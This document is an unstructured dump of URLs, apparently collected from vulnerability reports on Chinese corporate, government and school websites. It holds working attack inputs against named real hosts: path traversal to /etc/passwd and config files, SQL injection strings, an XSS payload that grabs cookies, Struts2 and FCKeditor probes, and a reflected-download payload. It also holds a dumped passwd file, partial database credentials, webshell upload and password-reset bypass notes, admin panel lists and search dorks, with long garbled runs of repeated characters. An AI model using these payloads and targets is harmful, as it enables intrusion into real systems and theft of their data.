gys.zon100.com/qyhy/template/mb1/qyhy.jsp?id=222 http://wall.easou.com/.svn/entries http://srm.hisense.com:8001/SRMWeb/ http://srm.hisense.com:8001/SRMWeb/Error.aspx?entrytype=RULE1 https://github.com/momoplan/wap/blob/6550fc09c3b1d638b0b62e11c425b37f26f968c6/conf/test/.svn/text-base/jrtWAPSite.properties.svn-base https://github.com/jinstrive/hack_flavor/blob/cc9310b651e1eb0bf1ed17c1773fec2751ad841a/server/conf/settings.py coding:utf-8 http://www.eshop-ftms.com/userset.aspx?uid=156&utid=1 http://www.eshop-ftms.com/userset.aspx?uid=156&utid=1 http://srm.hisense.com:8001/SRMWeb/ com:8001/SRMWeb目录 http://srm.hisense.com:8001/SRMWeb/3.txt http://www.dztjw.gov.cn/admin/Admin_Login.asp http://boc.lyg.gov.cn/Japan/second.aspx?folderId=200001 http://boc.lyg.gov.cn/English/second.aspx?folderId=100001 http://218.75.120.153:8080/zjzsonline/protocol.do http://www.zhongguowangshi.com/scencelist.aspx http://zgws.xinhuanet.com/scencelist.aspx http://**.**.**/datareport/login_loginAutoDomain.action_ http://**.**.**/bsweb/login.action_ http://ekp.lc.haier.com:81/message.do http://itpx.haier.com/database/bup.asp 
http://itpx.haier.com/database/bak/ http://fw.rrs.com/snaplb/anonymous/topic/portal/b9d68cdc-46e8-4b69-bfe4-f7f5c06d2d80?topicTypeId=2 http://www.neverwinterol.com.cn/login!login.action www.173.com http://qingyuan7.com/cctrl/backup/index.php jiwei.hebau.edu.cn/list.php?cid=5 inurl:qtdisp.asp?disp_id= http://oa.bzrkjs.gov.cn/qtdisp.asp?disp_id=1522 http://www.clhszxx.cn/gwqs/qtdisp.asp?disp_id=1488 http://www.84891.com/qtdisp.asp?disp_id=1149 http://www.pw8.cn/qtlist.asp?id=17 http://www.cjkchina.net/qtlist.asp?id=362 http://www.zdct.cn/gwqs/qtlooker.asp?look_id=1231 http://www.wjszxx.com/documents/qtlooker.asp?look_id=4664 http://tz.jz.qdedu.net/qtlooker.asp?look_id=9791 http://qpb.uodoo.com/api/task?task_id=4481e69bb2404d3b8741c7b67ebb997a site:rjjy.gov.cn filetype:xls http://mi.qianlong.com/,存在sql注入,权限分配不当,网站配置不当导致爆路径 http://zsjggw.xnu.edu.cn/bluelist.aspx?qnum=1 http://p.hsort.com/bluelist.aspx?qnum=1 http://dztb.cufe.edu.cn/bluelist.aspx?qnum=1 http://epaper.btwhw.com/bluelist.aspx?qnum=1 http://182.129.150.10:8001/model/TwoGradePage/equipmentlist.aspx?columnId=92&pid=89&clname=%u8bbe%u5907%u67e5%u8be2 http://182.129.150.10:8001/model/TwoGradePage/labmore.aspx?columnId=18&pid=17&clname=%u5b9e%u9a8c%u5ba4%u9884%u7ea6 http://182.129.150.10:8001/index.html http://sopbbs.suning.com/config/config_global.php.1 http://61.129.250.80//workorder-web/wod/onlineCompla/checkList.html http://61.129.250.80 http://f.lefeng.com/ http://english.swjtu.edu.cn/public/viewNews.aspx?ID=154 http://sms.ycxcxx.com/ http://mobilephone.keepc.com:2009/charge?src=35&kcid=116353269&paytype=31&goodstype=2&money=30 http://web.gdupt.edu.cn/shekebu/new/data/afds98.php http://mail.sh.cn/ http://mail.sh.cn/NewMailSh/smmail/jsp/Portal/Lqxx.jsp?sKeyword= http://bbs.smmail.cn/bbs/smmail/jsp/main/index.jsp) https://jinshuju.net/forms/QHzTX7/es_my_entries/detail_index?page=1 https://jinshuju.net/forms/QHzTX7/es_my_entries/detail_index?page=2 
https://jinshuju.net/forms/QHzTX7/es_my_entries/detail_index?page=62 jinshuju.net/f/ http://club.alipay.com/simple/index.php?t10774135.html http://182.131.21.49:8080/newsDetail.aspx?Channel=1461120347 http://vfs.zjweu.edu.cn/sports/web/admin/Jv_login.asp http://www.hateacher.edu.cn/upload/003013014/20075632359110.jsp http://www.fmtaobao.com/admin inurl:IndexViewController.do?method=index http://www.lazfcg.gov.cn/huoshan/IndexViewController.do?method=index http://www.hszgj.cn/IndexViewController.do?method=index http://kszfcg.gov.cn/IndexViewController.do?method=index http://www.szzfcg.gov.cn/IndexViewController.do?method=index http://www.ydzfcg.gov.cn/IndexViewController.do?method=index http://ztb.taihe.gov.cn/IndexViewController.do?method=index http://www.qdkfqcg.gov.cn/IndexViewController.do?method=index http://www.fcxzfcg.gov.cn/IndexViewController.do?method=index http://www.lbzfcg.gov.cn/IndexViewController.do?method=index http://cgzx.ahzfcg.gov.cn/IndexViewController.do?method=index http://www.tlzbcg.com/IndexViewController.do?method=index http://www.sxzfcg.gov.cn/IndexViewController.do?method=index http://www.sixianzfcg.gov.cn/IndexViewController.do?method=index http://222.216.4.8/IndexViewController.do?method=index http://www.jimozfcg.cn/IndexViewController.do?method=index http://www.jzzfcg.gov.cn/IndexViewController.do?method=index http://218.22.70.134:85/IndexViewController.do?method=toLogin http://www.xxzfcg.gov.cn/IndexViewController.do?method=index http://www.hnzfcg.gov.cn/IndexViewController.do?method=index http://www.mczb.gov.cn/IndexViewController.do?method=index http://hscgw.gov.cn/IndexViewController.do?method=index http://www.lazfcg.gov.cn/yeji/IndexViewController.do?method=index http://www.lazfcg.gov.cn/jinan/IndexViewController.do?method=index http://www.lazfcg.gov.cn/shucheng/IndexViewController.do?method=index http://www.lazfcg.gov.cn/IndexViewController.do?method=index http://www.lazfcg.gov.cn/huoqiu/IndexViewController.do?method=index 
http://lbzfcg.gov.cn/IndexViewController.do?method=index http://mczb.gov.cn/IndexViewController.do?method=index http://zfcg.mccz.gov.cn/IndexViewController.do?method=index http://caigou.pingdu.gov.cn/IndexViewController.do?method=index http://zfcg.laoshan.gov.cn:88/IndexViewController.do?method=index http://www.aqzfcg.gov.cn/IndexViewController.do?method=index http://www.yqzfcg.cn/IndexViewController.do?method=index http://www.cngpc.com/IndexViewController.do?method=index http://lazfcg.gov.cn/IndexViewController.do?method=index http://60.171.34.186/IndexViewController.do?method=index gczfcg.gov.cn/CmsNewsController.do?imgUrl1=../../../../../../../../../../etc/passwd&method=showImg gczfcg.gov.cn/CmsNewsController.do?imgUrl1=../WEB-INF/classes/db/hibernate.properties&method=showImg http://www.hnzfcg.gov.cn/CmsNewsController.do?imgUrl1=../../../../../../../../../../etc/passwd&method=showImg http://www.hnzfcg.gov.cn//CmsNewsController.do?imgUrl1=../WEB-INF/classes/db/hibernate.properties&method=showImg http://106.3.37.71/UserLoginAction/huiyuanLogin.action http://www.lankecms.com inurl:eshownews.asp?id= inurl:showshop.asp http://www.ampixel.com/eshownews.asp?id=61 http://ampixel.com/eshownews.asp?id=62 http://www.up-real.com/eshownews.asp?id=106 http://www.trendtronic.com.cn/eshownews.asp?id=65 http://www.jeffhouse.net/eshownews.asp?id=103 http://www.sdrunzhou.com/showcases.asp?id=60 http://www.planning.org.cn/news/shownews.asp?id=471 http://www.ttlg.com/shownews.asp?id=895 http://www.asmcs.com/shownews.asp?id=492 http://www.3dxchina.com/shownews.asp?id=100 http://www.up-real.com/showshop.asp?id=72 http://www.jdart.cn/showshop.asp?id=169 http://www.ospchina.com/showshop.asp?id=63 http://bbs.9377.com/home.php?mod=space&do=profile&uid=1223 http://www.9377.com/login.php?do=login&gourl=http://www.9377.com&password=密码&username=用户名(已拿到的) http://106.3.37.9:8080/ URL:http://www.bjsdermyy.com/newshow.php?id=1117 http://www.bjsdermyy.com/newshow.php?id=1117 
http://www.bjsdermyy.com/newshow.php?id=1117 http://www.czmz.gov.cn/download.asp?filename=download.asp http://support1.lenovo.com.cn/lenovo/wsi/usercenternew/userinfo/detail.aspx?lenovoid_id=341547&DoRefreshUrl=http%3a%2f%2fdianping.lenovo.com.cn%2fPages%2fPC%2fUserCenter%2fRefreshPage.html http://017.kouyu100.com/zywxx/forgetPWD.action?domain=zywxx http://www.17u.net/plane/jpresult.asp?ddlOrgCity1=PEK&ddlDesCity1=SHA&txtGoDate=2014-12-18 http://222.35.36.235:9901/login.jsp http://127.0.0.1/tipask/tipask/?user/profile.html http://www.yinlu.com/login.aspx http://**.**.**/s/1dD0Bd9R http://s.haier.com/haierproject/fankui-new/fankui/new/pinglun.php?aid=6&fen=5&uid=&username= http://www.yeepay.com/individualservice/Login.action http://www.yeepay.com/individualservice/Login.action?redirect:/xxoo http://www.yeepay.com/individualservice/xxoo http://www.yeepay.com/individualservice/Login.action?java.io.File http://www.yeepay.com/individualservice/Login.action?java.io.PrintWriter http://www.hospital-cqmu.com/k/lnk/index.php?file=zxdt&smid=55&zxid=262存在SQL注入漏洞 http://www.hospital-cqmu.com/index.php?file=1 http://cx-5.changan-mazda.com.cn/market/2014sky/?id=171 http://106.3.37.121/ http://ehr.cofco.com/ https://home.cofco.com/dana-na/auth/url_default/welcome.cgi https://home.cofco.com/entsmsfront/,DanaInfo=sms.cofco.com+indexAction.do http://drvdisc1.lenovo.com/bak/Default.aspx?key=1 http://www.peopledigital-sh.com.cn/ http://www.peopledigital-sh.com.cn/service1.aspx?aid=12 http://www.peopledigital-sh.com.cn/manager/Login.aspx http://www.povos.com.cn/cn/index.aspx http://pcp.povos.com.cn/6s_detail.jsp?id=10023 http://www.povos.com.cn/admin/ https://ipgpassport.lenovo.com/security/forgetPassword.action https://tender.wanda.cn/COST https://tender.wanda.cn/COST/contractweb/forgetpd.aspx http://sms.womai.com/login.aspx http://payadmin.pateo.com.cn/ inurl:www.kaiyuan.eu/?go=order http://99.zhaopin.com http://kdjyxk.post.gov.cn/companyLogin.jsp inurl:ah.189.cn/order inurl:xyadmin 
http://lflc.hbmu.edu.cn/ http://gxb.hbmu.edu.cn/ http://www.blyzms.com/ http://zhaosheng.sdzy.cn/html/ http://bllfzx.com/ http://www.hssxfl.com/hssxfl/ http://www.cygjyzx-edu.com/ http://www.scwyzjx.com/ http://wchyyy.gotoip2.com/ http://www.ptxez.com/ http://pj.akvtc.com/ http://www.bxxy.com/sonsite/mag_dep/ http://comment2.rayli.com.cn/manage/ http://www.jit.com.cn/ http://218.27.140.5/zwdtSjgl/Manual/Manual.jsp?depid=013524006 http://218.62.100.33:8000/zwdtSjgl/Manual/Manual.jsp?depid=01361537-0 http://122.141.66.213/zwdtSjgl/Manual/Manual.jsp?depid=013571777 http://222.160.175.90/zwdtSjgl/Manual/Manual.jsp?depid=01358800-x http://222.160.140.29:8000/zwdtSjgl/Manual/Manual.jsp?depid=013581895 http://mail.fuck.com:8080/enterprise/swfupload/swfupload/swfupload.swf?movieName=%22%5d%29;}catch%28e%29{}if%28!self.a%29self.a=!alert%28document.cookie%29;// ftp://113.107.172.62/即可 http://www.gzzyy.com/Index/index.php/Show/picDetail/no/1251698837/id/1809 http://www.gzzyy.com/Index/index.php/Show/picDetail/no/1251698837/id/1809 http://www.gzzyy.com/Index/index.php/Show/picDetail?no=1251698837&id=1809 http://www.gzzyy.com/Index/index.php/Show/picDetail?no=1251698837&id=1809 http://101.231.159.185:8080/index.html www.buaa.edu.cn www.ly.com http://www.gdphone.net/admin/Menu.htm,在友情链接那里不用登陆就可以上传webshell, http://www.gdphone.net/img_link/20141222072016.aspx。 http://localhost/a.php?aid=x1 http://bailing.iyiyun.com/plus/download.php http://192.168.4.70/dedecms5.7/dedecms5.7-20110624/uploads/plus/recommend.php http://192.168.4.70/a.php?aid=1%s%20union%20select%201%20from%20table https://github.com/ydf/StaticServer/blob/b1ddfc0ef498d9e009ddb8536cad2465cb60c661/settings.py sqlite:/// mysql://root:3***@42*******7:3**8/wiplatform mysql://work:3***@42*******7:3**8/usertest mysql://work:3***@42*******7:3**8/test'widash-test.wiwide.com https://passport.wiwide.com http://m.cheyipai.com/#6 http://mcbbs.kuaikuai.cn/forum.php http://www.268v.com/ http://train.268v.com/ 
http://train.268v.com/Report/ReportList.aspx?VIN=LBEMCACA66X030197&License=%E4%BA%ACK36856&Id=401636%20and%201=%28select%20@@VERSION%29 http://mail.qq.com/cgi-bin/login?vt=passport&vm=wsk&delegate_url http://www.chinapost.com.cn/TextLives.do?act=loadMore&sql= http://10.10.1.61:9000/complain/advisory/view.do?adviId=6874 http://sswz.chinapost.gov.cn/complain/advisory/view.do?adviId=6874 http://sswz.chinapost.gov.cn/complain/advisory/view.do?adviId=6875 http://sswz.chinapost.gov.cn/complain/advisory/ http://www.wooyun.org/bugs/wooyun-2010-087806 http://**.**.**/bugs/wooyun-2010-026771_ http://**.**.**/corps/%E6%B5%B7%E5%B0%94%E9%9B%86%E5%9B%A2 http://ebooking.17u.cn http://www.baidu.com/s?ie=utf-8&f=8&rsv_bp=1&tn=baidu&wd=团购对账详情-同程酒店管理系统&rsv_pq=db17877800001a17&rsv_t=484ear5Gp7N7iYCdFzaNulIeXgurqqiEz47GHeHuAtJQ7myYbnb9wVnpqTE&rsv_enter=1&rsv_n=2&rsv_sug3=1&rsv_sug2=0&inputT=312 http://ebooking.17u.cn/hotelgroupbuy/groupbuytakeoffconfrim?serialid=t140401004769 http://ebooking.17u.cn/hotelgroupbuy/groupbuytakeoffconfrim?serialid=t140401004770 http://ebooking.17u.cn/hotelgroupbuy/groupbuytakeoffconfrim?serialid=t140401004771 http://www.baidu.com/s?wd=尾房销售-同程酒店管理系统&ie=utf-8 http://ebooking.17u.cn/同程ebooking操作指南.pdf http://218.58.70.220/Protype/ http://218.58.70.220/Protype/uploadfiles/20141220231624.asa http://www.bjgold.com.cn/index.action http://116.204.96.198:8822/ http://1.202.136.201:8080/manager/html http://www.kysec.cn/CListShow.aspx?ColID=13&GUID={0F839366-88D9-4FA9-8E8E-725917239264}存在sql注入漏洞 http://www.hhhtbtjc.com/swzl/view/readswzl.jsp?id=L201410090002 http://www.hhhtbtjc.com/swzl/view/addswzl.jsp?id=L201410200001 http://extra.lenovo.com http://extra.lenovo.com/ams/view.php?id=18 http://whitehat007.blog.sohu.com/ http://pis.hebrkjsw.gov.cn/ http://kc.cheyipai.com/page/car.aspx?b=&c=&t=-1&m1=&m2=&y1=&y2= http://125.64.8.10/index.php?m=admin&c=index&a=login&pc_hash=cQ9Wgy http://rtx.minshengec.cn:8012” http://rtx.minshengec.cn:8012/admin.php 
http://www.jit.com.cn/ http://218.27.207.22/zwdtSjgl/Directory/iframeAgencyFunctions.jsp?department_no=1 http://61.232.168.107/zwdtSjgl/Directory/iframeAgencyFunctions.jsp?department_no=1 http://zwgk.wangqing.gov.cn/zwdtSjgl/Directory/iframeAgencyFunctions.jsp?department_no=1 http://218.62.100.33:8000/zwdtSjgl/Directory/iframeAgencyFunctions.jsp?department_no=1 http://218.62.90.168/zwdtSjgl/Directory/iframeAgencyFunctions.jsp?department_no=1 http://kc.cheyipai.com/page/carInfo.aspx?id=1407525 http://rsc.ustb.edu.cn/page.asp http://rsc.ustb.edu.cn/page.asp http://rsc.ustb.edu.cn/page.asp http://oetc.imooc.com/ http://xinche.taotaocar.com/xinche/quanguobaojia.aspx?classid=161011001 http://tieba.baidu.com/toutu/addContent http://tieba.baidu.com/p/3288419523 inurl:gn.asp?m= http://219.139.35.98:98/ http://61.167.199.246/jmc/ http://jw.hnsfjy.net/ http://www1.tyust.edu.cn/yuanxi/jsjg/ http://tw.lmu.cn/ http://210.26.80.118/jpkc/shyj/ http://spp.sunits.com/ http://uc.sunits.com/index.php?m=content&c=index&a=show&catid=6&id=137%27 http://home.sunits.com/ http://www.starbucks.com.cn/web.rar http://cms.starbucks.com.cn:8888/ http://m.taotaocar.com/paimai/index.aspx inurl:buy.asp?action=show inurl:viewreturn.asp?Page= http://www.0830fh.com/ http://www.yzshejiu.com/ http://www.2000textile.com/ http://www.jmally.com/ http://www.nkdz.org/ http://www.muziwang.com/ http://jiuye.hebau.edu.cn/danganchaxun/excel/index.php http://oracle.taiji.com.cn:8080/docs/funcspecs/5.jsp http://www.yqdaxx.org/docs/funcspecs/5.jsp http://xyzh.sau.edu.cn/docs/funcspecs/1.jsp http://journal.9med.net/qikan/article.php?id=196966 http://sp.wissun.com/,访问网页跳转到:http://sp.wissun.com/meeting/app/meetinglist/todayDataList.action?menuname=24000_24001_24002,如图所示: http://www.xhsd.cn/book/MusicAttributeor.jsp http://www.minjiao.com/ http://web.ptjy.com/web/web_programs_dotnet/adminmanage/Default.aspx http://www.zzyxjy.com/Web/Web_Programs_DotNet/adminmanage/Default.aspx 
http://school.mwedu.gov.cn/web/web_programs_dotnet/adminmanage/Default.aspx http://school.gledu.gov.cn/web/web_programs_dotnet/adminmanage/Default.aspx http://school.zzlwjy.com/web/web_programs_dotnet/adminmanage/Default.aspx http://school.fjhajy.net/web/web_programs_dotnet/adminmanage/Default.aspx http://schoolweb.ctjy.net/web/web_programs_dotnet/adminmanage/Default.aspx http://school.fjjyjy.net/web/web_programs_dotnet/adminmanage/Default.aspx http://www.ptedu.gov.cn/web/web_programs_dotnet/adminmanage/Default.aspx www.qledu.gov.cn/web/web_programs_dotnet/adminmanage/Default.aspx inurl:cms/whatycms http://training.cnca.cn/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=/../ http://www.teach-in-china.com.cn/hd.aspx?id=2 http://www.bioce.zjut.edu.cn/news_surface.asp?id=105 http://www.bioce.zjut.edu.cn/admin1/index.asp http://mclub.migu.cn/ucenter/admin.php http://wooyun.org/bugs/wooyun-2014-088099 http://webmail30.189.cn/w2/option/addFilter.do?name=all&condition=3005&senderInclude=1001&sender=&subjectInclude=1001&subject=&sizeCompare=1007&mailSize=&action=0&setLabelId=41167481&setBoxId=1&autoForward=test%40test.com&autoReply=&id=-1 https://e.189.cn/iframe/modifyAlias.do http://www.teemai.com/teemai.zip http://www.teemai.com/index.php?g=coyouda http://www.ahpfpc.gov.cn/TPL2006N/zzjg.php?name=%D2%A9%BE%DF%D5%BE http://www.ahpfpc.gov.cn/TPL2006N/zzjg.php?name=%D2%A9%BE%DF%D5%BE http://www.rsc.zjut.edu.cn http://www.rsc.zjut.edu.cn/upfile.asp http://www.rsc.zjut.edu.cn/Detail.asp?replyID=126 http://www.rsc.zjut.edu.cn/admin.asp http://www.jit.com.cn/ http://218.86.25.110:8080/interlib/common/ http://wooyun.org/bugs/wooyun-2014-062374 http://wooyun.org/bugs/wooyun-2014-066075)即可查看他人卡扇区密码,使用UID卡任意制作他人的卡片,随意消费了,而不需要物理接触到他人卡片。 http://mall.pigai.org/ http://www.asdht.com/ http://tuan.eduts.com/biz/login.aspx http://tuan.2760391.cn/biz/Login.aspx http://www.ndtuan.com/biz/login.aspx 
http://m.5izi.com/biz/login.aspx http://benear.net/biz/login.aspx http://tg.mm315.cn/biz/login.aspx http://www.pxtb.org//biz/login.aspx http://jiaodatuan.com/biz/login.aspx http://www.tongluowan.com/biz/login.aspx http://tuan.hk360buy.com/biz/login.aspx http://www.mtuan365.com/biz/login.aspx http://tuangou.yongyao.net/biz/login.aspx http://www.vlvyou.com/biz/login.aspx http://xss.re/6966 http://xss.re/6966 view-source:http://www.zzkscx.com/sysweb/admin_list.aspx可看到全部用户名,以及重置用户密码的方法,直接访问http://www.zzkscx.com/sysweb/resetKeyWord.aspx?userid=root,可直接修改最高权限账号密码,从而访问系统(登陆页面http://www.zzkscx.com/Login.aspx)获取信息 http://union.ly.com http://www.xcfdc.gov.cn/news.asp?bd=7 http://www.ibox.com http://go.ly.com/user/message/ www.17u.com https://gamma.designcenter.hp.com/cgi-bin/gamma2/client/gatekeeper.cgi http://go.wiwide.com/s/suser.php http://go.wiwide.com/download/dbw090331041030.sql http://go.wiwide.com/cache/password.file http://go.wiwide.com//test/PHP.zip http://go.wiwide.com/media/v1/css/mobile/.svn/entries http://210.75.220.222/csls/ https://ebooking.ctrip.com/hotel-supplier-ebookinglogin/EbookingLogin.aspx https://ebooking.ctrip.com/hotel-supplier-ebookinglogin/IdentityVerification.aspx http://widash.wiwide.com/.svn/entries http://widash.wiwide.com/php.php http://widash.wiwide.com http://widash.wiwide.com http://42.159.152.171/svn/dash/tags/20141030/src/www http://42.159.152.171/svn/dash http://open.shopex.cn/docs/api_search/?method_type_id=22&docs_keyword=&platform_id=0 http://widash.wiwide.com/login/ http://t.hb.189.cn/ http://59.252.133.3/tabid/61/Default.aspx?returnurl=%2fDefault.aspx http://liantong.cheyipai.com www.96225.com存在命令执行漏洞struts2,容易导致数据库泄露,控制其他服务器。 https://www.96225.com/smkwebgate/page/consumePay.action http://write.blog.csdn.net/feedback?del=4630019 http://hqfwgs.lstc.edu.cn/files/index.php?id=355 http://www.sinotrans.com/vc/vc/para/opr_initvc.jsp?webid=1 http://www.sinotrans.com/vc/vc/para/opr_initvc.jsp?webid=1 
http://zs.baiyin.cn/spplay.asp?ArticleID=4390 http://wooyun.org/bugs/wooyun-2010-02959 http://www.cd-rail.cn/RailWay/Search?s= ip:54.167.122.231 port:27016 http://www.xncg.gov.cn/plus/ajaxs.aspx?action=GetRelativeItem&key=search%2525%2527%2529%2520%2575%256e%2569%256f%256e%2520%2573%2565%256c%2565%2563%2574%2520%2531%252c%2532%252c%2575%2573%2565%2572%256e%2561%256d%2565%252b%2527%257c%2527%252b%2570%2561%2573%2573%2577%256f%2572%2564%2520%2566%2572%256f%256d%2520%254b%2553%255f%2541%2564%256d%2569%256e%2500 http://www.yishion.com.cn/workdetail.php/workdetail.php?id=1 http://wiki.w31.cn/bbs/uc_server/ http://w31.cn http://wiki.w31.cn/wiki/images/f/f3/1.php http://wiki.w31.cn/bbs encap:Ethernet addr:10.**.**.** Bcast:10.**.**.** Mask:255.255.254.0 Scope:Link MTU:1500 packets:23062 packets:35055 txqueuelen:1000 http://123.130.246.26:9080/wscgs/xwl.do http://60.211.179.22:9080/wscgs/xwl.do http://www.bzwscgs.com:9080/wscgs/xwl.do http://www.lcwscgs.com/wscgs/xwl.do http://221.2.145.164:9080/wscgs/xwl.do http://58.59.39.43:9080/wscgs/xwl.do http://www.lycgs.gov.cn:9080/wscgs/xwl.do http://218.59.228.162/wscgs/xwl.do http://218.59.228.162/wscgs/xwl.do http://fec.sicnu.edu.cn/进行测试 http://fec.sicnu.edu.cn/soft.asp http://www.gygsl.gov.cn/Admin/admin_login.aspx http://m.cheyipai.com/api/download?t=apk&file=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd http://imgcache.qq.com/qqshow_v3/htdocs/inc/main.html http://imgcache.qq.com/qqshow_v3/htdocs/inc/header.html http://imgcache.qq.com/qqshow_v3/htdocs/inc/sidebar.html http://202.120.1.51:8086/ http://202.120.1.51:8086/sysmenumg/loadIndexMain.action存在sturts2 http://widash-test.chinacloudapp.cn/login/ http://www.haixindichan.com/ http://ccd.jxfda.gov.cn/ycportal/jsp/explorer/annex_file.jsp?url=/ http://119.163.120.215/ http://119.163.120.182:8080/ http://iweidu.renren.com/bbs/ http://www.bankzs.com/admin/mailbox/loan!search.action http://www.mogu.io/ http://www.mogu.io/user/list 
http://mail.zhenai.com/src/login.php http://mail.ea3w.com/login.php?Lang=invalid../../../../../../../../../../etc/passwd/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././ http://dd.game.pps.tv/index.php?m=front&c=bhzr_zlindex&a=bhzr_zldetail&id=1806&fid=192 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin saslauth:x:499:76:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin ldap:x:55:55:LDAP User:/var/lib/ldap:/sbin/nologin webid:x:500:500::/home/webid:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin zabbix:x:502:502::/home/zabbix:/sbin/nologin mysql:x:503:503::/usr/mysql:/bin/bash http://www.yylq.gov.cn/x.aspx ip:222.242.228.187 http://www.yynanhu.gov.cn/2.txt http://www.yycoop.com/2.txt http://www.yunxiqu.gov.cn/2.TXT http://www.leyou.com.cn/special/mall/Stores.php?id=461 http://play.easou.com/stc.e?bk=kdinfo3&infoId=5749&esid=oqxD9xCag9L&wver=c&qn=33&fr=33.10.1253.2.1.5749&version=c http://play.easou.com/stc.e?bk=kdinfo3&infoId=5749&esid=oqxD9xCag9L&wver=c&qn=33&fr=33.10.1253.2.1.5749&version=c http://www.flyhigh.com.cn/admin.php?ctrl=admin&ac=adminUserUp&id=1 
http://mail.cnmo.com/login.php?Lang=invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././ CAMSWebService.asmx/ValidateSabreID http://cams.svcs.hp.com http://60.10.8.78/ http://drops.wooyun.org/papers/3771 http://suggestion.baidu.com/su;/1.bat;?wd=&cb=calc||&sid=1440_2031_1945_1788&t=1362056239875然后它会弹出下载的页面。接着下载打开就直接执行这个了,详情还是要看看参考才行呢 